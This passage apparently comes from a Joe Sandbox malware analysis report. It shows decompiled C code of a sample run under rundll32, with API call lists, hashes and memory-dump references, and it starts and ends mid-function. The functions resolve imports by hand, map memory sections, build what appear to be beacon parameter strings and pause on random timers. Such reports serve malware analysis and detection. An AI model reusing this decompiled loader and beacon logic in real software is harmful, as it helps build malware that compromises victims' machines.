				_Unknown_base(*)()* _t53;
				CHAR* _t54;
				_Unknown_base(*)()* _t55;
				void* _t58;
				signed int _t59;
				_Unknown_base(*)()* _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				signed int _t68;
				void* _t69;
				CHAR* _t71;
				signed short* _t73;

				_t69 = __edi;
				_v20 = _v20 & 0x00000000;
				_t59 =  *0x703341cc;
				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x4d92f9a0));
				if(_t43 != 0) {
					_t45 = _t43 + __edi;
					_v12 = _t45;
					_t46 =  *((intOrPtr*)(_t45 + 0xc));
					if(_t46 != 0) {
						while(1) {
							_t71 = _t46 + _t69;
							_t47 = LoadLibraryA(_t71); // executed
							_v28 = _t47;
							if(_t47 == 0) {
								break;
							}
							_v24 = _v24 & 0x00000000;
							 *_t71 = _t59 - 0x69b25f44;
							_t49 = _v12;
							_t61 =  *((intOrPtr*)(_t49 + 0x10));
							_t50 =  *_t49;
							if(_t50 != 0) {
								L6:
								_t73 = _t50 + _t69;
								_v16 = _t61 + _t69;
								while(1) {
									_t51 =  *_t73;
									if(_t51 == 0) {
										break;
									}
									if(__eflags < 0) {
										__eflags = _t51 - _t69;
										if(_t51 < _t69) {
											L12:
											_t21 =  &_v8;
											 *_t21 = _v8 & 0x00000000;
											__eflags =  *_t21;
											_v24 =  *_t73 & 0x0000ffff;
										} else {
											_t65 = _a4;
											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
												goto L12;
											} else {
												goto L11;
											}
										}
									} else {
										_t51 = _t51 + _t69;
										L11:
										_v8 = _t51;
									}
									_t53 = _v8;
									__eflags = _t53;
									if(_t53 == 0) {
										_t54 = _v24 & 0x0000ffff;
									} else {
										_t54 = _t53 + 2;
									}
									_t55 = GetProcAddress(_v28, _t54);
									__eflags = _t55;
									if(__eflags == 0) {
										_v20 = _t59 - 0x69b25ec5;
									} else {
										_t68 = _v8;
										__eflags = _t68;
										if(_t68 != 0) {
											 *_t68 = _t59 - 0x69b25f44;
										}
										 *_v16 = _t55;
										_t58 = 0x593682f4 + _t59 * 4;
										_t73 = _t73 + _t58;
										_t32 =  &_v16;
										 *_t32 = _v16 + _t58;
										__eflags =  *_t32;
										continue;
									}
									goto L23;
								}
							} else {
								_t50 = _t61;
								if(_t61 != 0) {
									goto L6;
								}
							}
							L23:
							_v12 = _v12 + 0x14;
							_t46 =  *((intOrPtr*)(_v12 + 0xc));
							if(_t46 != 0) {
								continue;
							} else {
							}
							L26:
							goto L27;
						}
						_t60 = _t59 + 0x964da13a;
						__eflags = _t60;
						_v20 = _t60;
						goto L26;
					}
				}
				L27:
				return _v20;
			}

0x70331a0a
0x70331a13
0x70331a18
0x70331a1e
0x70331a27
0x70331a2d
0x70331a2f
0x70331a32
0x70331a37
0x70331a3e
0x70331a3e
0x70331a42
0x70331a4a
0x70331a4d
0x00000000
0x00000000
0x70331a53
0x70331a5d
0x70331a5f
0x70331a62
0x70331a65
0x70331a69
0x70331a71
0x70331a73
0x70331a76
0x70331ade
0x70331ade
0x70331ae2
0x00000000
0x00000000
0x70331a7b
0x70331a81
0x70331a83
0x70331a96
0x70331a99
0x70331a99
0x70331a99
0x70331a9d
0x70331a85
0x70331a85
0x70331a8d
0x70331a8f
0x00000000
0x00000000
0x00000000
0x00000000
0x70331a8f
0x70331a7d
0x70331a7d
0x70331a91
0x70331a91
0x70331a91
0x70331aa0
0x70331aa3
0x70331aa5
0x70331aac
0x70331aa7
0x70331aa7
0x70331aa7
0x70331ab4
0x70331aba
0x70331abc
0x70331aec
0x70331abe
0x70331abe
0x70331ac1
0x70331ac3
0x70331acb
0x70331acb
0x70331ad0
0x70331ad2
0x70331ad9
0x70331adb
0x70331adb
0x70331adb
0x00000000
0x70331adb
0x00000000
0x70331abc
0x70331a6b
0x70331a6d
0x70331a6f
0x00000000
0x00000000
0x70331a6f
0x70331aef
0x70331aef
0x70331af6
0x70331afb
0x00000000
0x00000000
0x70331b01
0x70331b0c
0x00000000
0x70331b0c
0x70331b03
0x70331b03
0x70331b09
0x00000000
0x70331b09
0x70331a37
0x70331b0d
0x70331b12

APIs

LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 70331A42
GetProcAddress.KERNEL32(?,00000000), ref: 70331AB4

Memory Dump Source

Source File: 00000017.00000002.735843702.0000000070331000.00000020.00020000.sdmp, Offset: 70330000, based on PE: true

Associated: 00000017.00000002.735830100.0000000070330000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.735858122.0000000070333000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.735877674.0000000070335000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.735897152.0000000070336000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_70330000_rundll32.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: 05580adad10982106cc78f31f82ce69be200e200f885699f2e58dcd5b077c203
Instruction ID: 7cfacf31307cf5cb91121b9c93df20afaa2cdb4618626769c16a8d2227759f5f
Opcode Fuzzy Hash: 05580adad10982106cc78f31f82ce69be200e200f885699f2e58dcd5b077c203
Instruction Fuzzy Hash: 47310571A0220A9FDB05CF99C9D0AAEF7F9AF04252F6144ADD806EB354E774DA40DB90

Uniqueness

Uniqueness Score: -1.00%

Function 70331B4A, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E70331B4A(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}

0x70331b5c
0x70331b62
0x70331b70
0x70331b77
0x70331b7c
0x70331b82
0x00000000
0x70331b83
0x00000000

APIs

NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,703313F4,00000002,00000000,?,?,00000000,?,?,703313F4,00000000), ref: 70331B77

Memory Dump Source

Source File: 00000017.00000002.735843702.0000000070331000.00000020.00020000.sdmp, Offset: 70330000, based on PE: true

Associated: 00000017.00000002.735830100.0000000070330000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.735858122.0000000070333000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.735877674.0000000070335000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.735897152.0000000070336000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_70330000_rundll32.jbxd

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction ID: ef4d52113c1e0c2197be2704ba8d977777690a4907d6db0eb40fa97907e5d678
Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction Fuzzy Hash: 0BF012B590020CBFDB119FA5CC85C9FFBBDEB443A5F104979B152E1190D6709E089A60

Uniqueness

Uniqueness Score: -1.00%

Function 00C248C2, Relevance: 34.7, APIs: 23, Instructions: 220
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 70%

			E00C248C2(long __eax, void* __edx, intOrPtr _a8, intOrPtr _a12, void* _a20, intOrPtr _a28) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v24;
				intOrPtr _v40;
				void* __ecx;
				void* __edi;
				void* _t29;
				intOrPtr _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				void* _t38;
				intOrPtr _t39;
				int _t42;
				void* _t43;
				intOrPtr _t44;
				intOrPtr _t48;
				intOrPtr _t52;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr* _t68;
				void* _t69;
				intOrPtr _t78;
				intOrPtr _t81;
				intOrPtr _t84;
				int _t87;
				intOrPtr _t88;
				int _t91;
				intOrPtr _t92;
				int _t95;
				void* _t98;
				void* _t99;
				void* _t103;
				intOrPtr _t105;
				long _t107;
				intOrPtr _t108;
				intOrPtr* _t109;
				long _t110;
				int _t111;
				void* _t112;
				void* _t113;
				void* _t114;
				void* _t115;
				void* _t117;
				void* _t118;
				void* _t120;
				void* _t121;

				_t103 = __edx;
				_t110 = __eax;
				_v8 = 8;
				_t29 = RtlAllocateHeap( *0xc2a290, 0, 0x800); // executed
				_t117 = _t29;
				if(_t117 != 0) {
					if(_t110 == 0) {
						_t110 = GetTickCount();
					}
					_t31 =  *0xc2a018; // 0xe0c3a72a
					asm("bswap eax");
					_t32 =  *0xc2a014; // 0x5cb11ae7
					asm("bswap eax");
					_t33 =  *0xc2a010; // 0x15dc9586
					asm("bswap eax");
					_t34 =  *0xc2a00c; // 0x8e03bf7
					asm("bswap eax");
					_t35 =  *0xc2a2d4; // 0x449d5a8
					_t2 = _t35 + 0xc2b622; // 0x74666f73
					_t111 = wsprintfA(_t117, _t2, 2, 0x3d163, _t34, _t33, _t32, _t31,  *0xc2a02c,  *0xc2a004, _t110);
					_t38 = E00C26A9F();
					_t39 =  *0xc2a2d4; // 0x449d5a8
					_t3 = _t39 + 0xc2b662; // 0x74707526
					_t42 = wsprintfA(_t111 + _t117, _t3, _t38);
					_t120 = _t118 + 0x38;
					_t112 = _t111 + _t42;
					if(_a12 != 0) {
						_t92 =  *0xc2a2d4; // 0x449d5a8
						_t7 = _t92 + 0xc2b66d; // 0x732526
						_t95 = wsprintfA(_t112 + _t117, _t7, _a12);
						_t120 = _t120 + 0xc;
						_t112 = _t112 + _t95;
					}
					_t43 = E00C22C60(_t99);
					_t44 =  *0xc2a2d4; // 0x449d5a8
					_t9 = _t44 + 0xc2b38a; // 0x6d697426
					_t113 = _t112 + wsprintfA(_t112 + _t117, _t9, _t43, _t103);
					_t48 =  *0xc2a2d4; // 0x449d5a8
					_t11 = _t48 + 0xc2b33b; // 0x74636126
					_t114 = _t113 + wsprintfA(_t113 + _t117, _t11, 0);
					_t52 =  *0xc2a32c; // 0x50c95b0
					_t121 = _t120 + 0x1c;
					if(_t52 != 0) {
						_t88 =  *0xc2a2d4; // 0x449d5a8
						_t13 = _t88 + 0xc2b685; // 0x73797326
						_t91 = wsprintfA(_t114 + _t117, _t13, _t52);
						_t121 = _t121 + 0xc;
						_t114 = _t114 + _t91;
					}
					_t105 =  *0xc2a37c; // 0x50c9630
					_a28 = E00C23A66(0xc2a00a, _t105 + 4);
					_t55 =  *0xc2a31c; // 0x50c95e0
					_t107 = 0;
					if(_t55 != 0) {
						_t84 =  *0xc2a2d4; // 0x449d5a8
						_t16 = _t84 + 0xc2b8e9; // 0x3d736f26
						_t87 = wsprintfA(_t114 + _t117, _t16, _t55);
						_t121 = _t121 + 0xc;
						_t114 = _t114 + _t87;
					}
					_t56 =  *0xc2a318; // 0x0
					if(_t56 != _t107) {
						_t81 =  *0xc2a2d4; // 0x449d5a8
						_t18 = _t81 + 0xc2b8e2; // 0x3d706926
						wsprintfA(_t114 + _t117, _t18, _t56);
					}
					if(_a28 != _t107) {
						_t98 = RtlAllocateHeap( *0xc2a290, _t107, 0x800);
						if(_t98 != _t107) {
							E00C22C46(GetTickCount());
							_t62 =  *0xc2a37c; // 0x50c9630
							__imp__(_t62 + 0x40);
							asm("lock xadd [eax], ecx");
							_t66 =  *0xc2a37c; // 0x50c9630
							__imp__(_t66 + 0x40);
							_t68 =  *0xc2a37c; // 0x50c9630
							_t69 = E00C27156(1, _t103, _t117,  *_t68); // executed
							_t115 = _t69;
							asm("lock xadd [eax], ecx");
							if(_t115 != _t107) {
								StrTrimA(_t115, 0xc292ac);
								_push(_t115);
								_t108 = E00C25C8D();
								_v4 = _t108;
								if(_t108 != 0) {
									 *_t115 = 0;
									__imp__(_t98, _a8);
									_t109 = __imp__;
									 *_t109(_t98, _t108);
									 *_t109(_t98, _t115);
									_t78 = E00C23097(0xffffffffffffffff, _t98, _v12, _v8); // executed
									_v40 = _t78;
									if(_t78 != 0 && _t78 != 0x10d2) {
										E00C23546();
									}
									HeapFree( *0xc2a290, 0, _v24);
								}
								RtlFreeHeap( *0xc2a290, 0, _t115); // executed
								_t107 = 0;
							}
							RtlFreeHeap( *0xc2a290, _t107, _t98); // executed
						}
						HeapFree( *0xc2a290, _t107, _a20);
					}
					RtlFreeHeap( *0xc2a290, _t107, _t117); // executed
				}
				return _v16;
			}

0x00c248c2
0x00c248d6
0x00c248d8
0x00c248e0
0x00c248e6
0x00c248ea
0x00c248f2
0x00c248fa
0x00c248fa
0x00c248fc
0x00c24908
0x00c24917
0x00c2491c
0x00c2491f
0x00c24924
0x00c24927
0x00c2492c
0x00c2492f
0x00c2493b
0x00c24948
0x00c2494a
0x00c24950
0x00c24955
0x00c24960
0x00c24962
0x00c24965
0x00c2496b
0x00c2496d
0x00c24976
0x00c24981
0x00c24983
0x00c24986
0x00c24986
0x00c24988
0x00c2498f
0x00c24994
0x00c249a1
0x00c249a3
0x00c249a8
0x00c249b6
0x00c249b8
0x00c249bd
0x00c249c2
0x00c249c5
0x00c249ca
0x00c249d5
0x00c249d7
0x00c249da
0x00c249da
0x00c249dc
0x00c249ef
0x00c249f3
0x00c249f8
0x00c249fc
0x00c249ff
0x00c24a04
0x00c24a0f
0x00c24a11
0x00c24a14
0x00c24a14
0x00c24a16
0x00c24a1d
0x00c24a20
0x00c24a25
0x00c24a2f
0x00c24a31
0x00c24a38
0x00c24a50
0x00c24a54
0x00c24a60
0x00c24a65
0x00c24a6e
0x00c24a7f
0x00c24a83
0x00c24a8c
0x00c24a92
0x00c24a9a
0x00c24a9f
0x00c24aac
0x00c24ab2
0x00c24aba
0x00c24ac0
0x00c24ac6
0x00c24aca
0x00c24ace
0x00c24ad4
0x00c24ad8
0x00c24adf
0x00c24ae6
0x00c24aea
0x00c24af5
0x00c24afc
0x00c24b00
0x00c24b09
0x00c24b09
0x00c24b1a
0x00c24b1a
0x00c24b29
0x00c24b2f
0x00c24b2f
0x00c24b39
0x00c24b39
0x00c24b4a
0x00c24b4a
0x00c24b58
0x00c24b58
0x00c24b68

APIs

RtlAllocateHeap.NTDLL(00000000,00000800,?), ref: 00C248E0
GetTickCount.KERNEL32 ref: 00C248F4
wsprintfA.USER32 ref: 00C24943
wsprintfA.USER32 ref: 00C24960
wsprintfA.USER32 ref: 00C24981
wsprintfA.USER32 ref: 00C2499F
wsprintfA.USER32 ref: 00C249B4
wsprintfA.USER32 ref: 00C249D5
wsprintfA.USER32 ref: 00C24A0F
wsprintfA.USER32 ref: 00C24A2F
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00C24A4A
GetTickCount.KERNEL32 ref: 00C24A5A
RtlEnterCriticalSection.NTDLL(050C95F0), ref: 00C24A6E
RtlLeaveCriticalSection.NTDLL(050C95F0), ref: 00C24A8C

Part of subcall function 00C27156: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,00C24A9F,00000000,050C9630), ref: 00C27181
Part of subcall function 00C27156: lstrlen.KERNEL32(00000000,?,00000000,00C24A9F,00000000,050C9630), ref: 00C27189
Part of subcall function 00C27156: strcpy.NTDLL ref: 00C271A0
Part of subcall function 00C27156: lstrcat.KERNEL32(00000000,00000000), ref: 00C271AB
Part of subcall function 00C27156: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,00C24A9F,?,00000000,00C24A9F,00000000,050C9630), ref: 00C271C8

StrTrimA.SHLWAPI(00000000,00C292AC,00000000,050C9630), ref: 00C24ABA

Part of subcall function 00C25C8D: lstrlen.KERNEL32(050C887A,00000000,00000000,00000000,00C24AC6,00000000), ref: 00C25C9D
Part of subcall function 00C25C8D: lstrlen.KERNEL32(?), ref: 00C25CA5
Part of subcall function 00C25C8D: lstrcpy.KERNEL32(00000000,050C887A), ref: 00C25CB9
Part of subcall function 00C25C8D: lstrcat.KERNEL32(00000000,?), ref: 00C25CC4

lstrcpy.KERNEL32(00000000,?), ref: 00C24AD8
lstrcat.KERNEL32(00000000,00000000), ref: 00C24AE6
lstrcat.KERNEL32(00000000,00000000), ref: 00C24AEA
HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 00C24B1A
RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 00C24B29
RtlFreeHeap.NTDLL(00000000,00000000,00000000,050C9630), ref: 00C24B39
HeapFree.KERNEL32(00000000,?), ref: 00C24B4A
RtlFreeHeap.NTDLL(00000000,00000000), ref: 00C24B58

Memory Dump Source

Source File: 00000017.00000002.733621809.0000000000C21000.00000020.00020000.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000017.00000002.733593892.0000000000C20000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733678494.0000000000C29000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.733725240.0000000000C2A000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733761318.0000000000C2C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_c20000_rundll32.jbxd

Similarity

API ID: wsprintf$Heap$Free$lstrcatlstrlen$AllocateCountCriticalSectionTickTrimlstrcpy$EnterLeavestrcpy
String ID:
API String ID: 1837416118-0
Opcode ID: f42e9003b02109af5edab4d2e9f86ff5ec8acc36f689bb883f83b331d8d11900
Instruction ID: 73a898f049a579bde430a0daadde69361a55221c6af35c2d21437c4e8a021c73
Opcode Fuzzy Hash: f42e9003b02109af5edab4d2e9f86ff5ec8acc36f689bb883f83b331d8d11900
Instruction Fuzzy Hash: B271AA72510615EFC731DB68EC88F5F77ECEB88300B150415F95EC3A21EA3AE9069B66

Uniqueness

Uniqueness Score: -1.00%

Function 00C250A3, Relevance: 16.6, APIs: 11, Instructions: 149
timememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E00C250A3(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t61;
				long _t65;
				signed int _t66;
				void* _t69;
				void* _t71;
				signed int _t72;
				intOrPtr _t74;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t74 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0xc2a298);
					_v20 = 0;
					_v16 = 0;
					L00C27DDC();
					_v36.LowPart = _t46;
					_v32 = _t74;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0xc2a2c4; // 0x2f0
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0xc2a2a4 = 5;
						} else {
							_t69 = E00C25335(_t74); // executed
							if(_t69 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0xc2a2b8 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t72 = _v12;
						_t58 = _t72 << 4;
						_t76 = _t80 + (_t72 << 4) - 0x54;
						_t73 = _t72 + 1;
						_v24 = _t72 + 1;
						_t61 = E00C25242( &_v20, _t73, _t76, _t73, _t80 + _t58 - 0x58, _t76,  &_v16); // executed
						_v8.LowPart = _t61;
						if(_t61 != 0) {
							goto L17;
						}
						_t66 = _v24;
						_t90 = _t66 - 3;
						_v12 = _t66;
						if(_t66 != 3) {
							goto L6;
						} else {
							_v8.LowPart = E00C274CB(_t73, _t90,  &_v92, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t61 - 0x10d2;
						if(_t61 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0xc2a29c);
							goto L21;
						} else {
							__eflags =  *0xc2a2a0; // 0x1
							if(__eflags == 0) {
								goto L12;
							} else {
								_t61 = E00C23546();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0xc2a2a0);
								L21:
								L00C27DDC();
								_v36.LowPart = _t61;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0); // executed
								_t65 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								__eflags = _t65;
								_v8.LowPart = _t65;
								if(_t65 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t71 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							HeapFree( *0xc2a290, 0, _t54);
						}
						_t78 =  &(_t78[4]);
						_t71 = _t71 - 1;
					} while (_t71 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}

0x00c250a3
0x00c250b5
0x00c250b8
0x00c250c4
0x00c250cc
0x00c250cf
0x00c25235
0x00c250d5
0x00c250d5
0x00c250d7
0x00c250dc
0x00c250dd
0x00c250e3
0x00c250e6
0x00c250e9
0x00c250f7
0x00c25102
0x00c25105
0x00c25107
0x00c25114
0x00c2511e
0x00c25122
0x00c25125
0x00c2512a
0x00c25135
0x00c25135
0x00c2512c
0x00c2512c
0x00c25133
0x00000000
0x00000000
0x00c25133
0x00c2513f
0x00000000
0x00c25142
0x00c25146
0x00c25151
0x00c25151
0x00c25158
0x00c2515d
0x00c25164
0x00c2516d
0x00c25173
0x00c25176
0x00c2517d
0x00c25180
0x00000000
0x00000000
0x00c25182
0x00c25185
0x00c25188
0x00c2518b
0x00000000
0x00c2518d
0x00c2519c
0x00c2519c
0x00000000
0x00c251ca
0x00c251ca
0x00c251cf
0x00c251ee
0x00c251f0
0x00c251f5
0x00c251f6
0x00000000
0x00c251d1
0x00c251d1
0x00c251d7
0x00000000
0x00c251d9
0x00c251d9
0x00c251de
0x00c251e0
0x00c251e5
0x00c251e6
0x00c251fc
0x00c251fc
0x00c25204
0x00c2520f
0x00c25212
0x00c2521d
0x00c2521f
0x00c25221
0x00c25224
0x00000000
0x00c2522a
0x00000000
0x00c2522a
0x00c25224
0x00c251d7
0x00000000
0x00c251cf
0x00c2519f
0x00c251a1
0x00c251a4
0x00c251a5
0x00c251a5
0x00c251a9
0x00c251b3
0x00c251b3
0x00c251b9
0x00c251bc
0x00c251bc
0x00c251c2
0x00c251c2
0x00c2523f
0x00000000

APIs

memset.NTDLL ref: 00C250B8
CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 00C250C4
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 00C250E9
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 00C25105
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00C2511E
HeapFree.KERNEL32(00000000,00000000), ref: 00C251B3
CloseHandle.KERNEL32(?), ref: 00C251C2
_allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 00C251FC
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,00C24579), ref: 00C25212
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00C2521D

Part of subcall function 00C25335: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,050C9318,00000000,?,74B5F710,00000000,74B5F730), ref: 00C25384
Part of subcall function 00C25335: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,050C9350,?,00000000,30314549,00000014,004F0053,050C930C), ref: 00C25421
Part of subcall function 00C25335: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00C25131), ref: 00C25433

GetLastError.KERNEL32 ref: 00C2522F

Memory Dump Source

Source File: 00000017.00000002.733621809.0000000000C21000.00000020.00020000.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000017.00000002.733593892.0000000000C20000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733678494.0000000000C29000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.733725240.0000000000C2A000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733761318.0000000000C2C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_c20000_rundll32.jbxd

Similarity

API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
String ID:
API String ID: 3521023985-0
Opcode ID: e552f97896dd185ea30f27001fb068bb80833d23f71d1d38d4817d9abad09872
Instruction ID: b85d02e184cc3e6135cbd83a75718c208937f79df81066aaaf128ff71ddd852e
Opcode Fuzzy Hash: e552f97896dd185ea30f27001fb068bb80833d23f71d1d38d4817d9abad09872
Instruction Fuzzy Hash: B9514871801229EFCF21DF94EC84BEFBFB9EB09320F204216F425A2590D7718A51DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C2682B, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73
sleepmemorytimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 73%

			E00C2682B(void* __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				char _v32;
				long _v40;
				void* _t14;
				void* _t16;
				int _t18;
				signed int _t20;
				void* _t22;
				signed int _t23;
				intOrPtr _t25;
				unsigned int _t29;
				void* _t34;
				signed int _t41;

				_t34 = __edx;
				_t14 = HeapCreate(0, 0x400000, 0); // executed
				 *0xc2a290 = _t14;
				if(_t14 != 0) {
					 *0xc2a180 = GetTickCount();
					_t16 = E00C21DFA(_a4);
					if(_t16 != 0) {
						L10:
						return _t16;
					} else {
						goto L3;
					}
					do {
						L3:
						GetSystemTimeAsFileTime( &_v12);
						_t18 = SwitchToThread();
						_t29 = _v12.dwHighDateTime;
						_t20 = (_t29 << 0x00000020 | _v12.dwLowDateTime) >> 5;
						_push(0);
						_push(0x13);
						_push(_t29 >> 5);
						_push(_t20);
						L00C27F3A();
						_t41 = _t18 + _t20;
						_t22 = E00C21FE8(_a4, _t41);
						_t23 = 3;
						Sleep(_t23 << (_t41 & 0x00000007)); // executed
					} while (_t22 == 1);
					_t25 =  *0xc2a2ac; // 0x2f4
					_v32 = 0;
					if(_t25 != 0) {
						__imp__(_t25,  &_v32);
						if(_t25 == 0) {
							_v40 = 0;
						}
						if(_v40 != 0) {
							 *0xc2a2b8 = 1; // executed
						}
					}
					_t16 = E00C2435F(_t34); // executed
					goto L10;
				}
				_t16 = 8;
				goto L10;
			}

0x00c2682b
0x00c26840
0x00c26848
0x00c2684d
0x00c26860
0x00c26865
0x00c2686c
0x00c268f7
0x00c268fd
0x00000000
0x00000000
0x00000000
0x00c26872
0x00c26872
0x00c26877
0x00c2687d
0x00c26883
0x00c2688d
0x00c26891
0x00c26892
0x00c26897
0x00c26898
0x00c26899
0x00c2689e
0x00c268a4
0x00c268af
0x00c268b6
0x00c268bc
0x00c268c1
0x00c268c8
0x00c268cc
0x00c268d4
0x00c268dc
0x00c268de
0x00c268de
0x00c268e6
0x00c268e8
0x00c268e8
0x00c268e6
0x00c268f2
0x00000000
0x00c268f2
0x00c26851
0x00000000

APIs

HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 00C26840
GetTickCount.KERNEL32 ref: 00C26857
GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001), ref: 00C26877
SwitchToThread.KERNEL32(?,00000001), ref: 00C2687D
_aullrem.NTDLL(?,?,00000013,00000000), ref: 00C26899
Sleep.KERNELBASE(00000003,00000000,?,00000001), ref: 00C268B6
IsWow64Process.KERNEL32(000002F4,?,?,00000001), ref: 00C268D4

Strings

[m, xrefs: 00C26860

Memory Dump Source

Source File: 00000017.00000002.733621809.0000000000C21000.00000020.00020000.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000017.00000002.733593892.0000000000C20000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733678494.0000000000C29000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.733725240.0000000000C2A000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733761318.0000000000C2C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_c20000_rundll32.jbxd

Similarity

API ID: Time$CountCreateFileHeapProcessSleepSwitchSystemThreadTickWow64_aullrem
String ID: [m
API String ID: 3690864001-2390560230
Opcode ID: 2ec76fd578cb3177a73def961b71e086532cb89faafab6f08142ae6568ada256
Instruction ID: f3a3108e8bd68e363726d1329e28591a85678ebfbba98befd29c6814ea59c677
Opcode Fuzzy Hash: 2ec76fd578cb3177a73def961b71e086532cb89faafab6f08142ae6568ada256
Instruction Fuzzy Hash: B521D2B2A14328AFD720AFA4FC99B6E77A8F748350F50493DF519C2990E770C9058B62

Uniqueness

Uniqueness Score: -1.00%

Function 00C266CE, Relevance: 13.6, APIs: 9, Instructions: 72
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 74%

			E00C266CE(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
